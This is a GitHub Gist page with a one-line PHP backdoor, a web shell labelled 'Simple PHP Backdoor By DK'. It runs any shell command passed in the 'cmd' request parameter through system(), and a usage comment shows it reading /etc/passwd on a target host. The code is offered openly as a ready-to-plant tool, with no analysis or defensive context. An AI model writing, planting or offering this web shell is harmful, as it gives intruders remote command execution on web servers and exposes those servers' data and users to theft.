Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save petrk94/1b9134ecca06fbeaa019c2bbc2534fc4 to your computer and use it in GitHub Desktop.
Save petrk94/1b9134ecca06fbeaa019c2bbc2534fc4 to your computer and use it in GitHub Desktop.
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment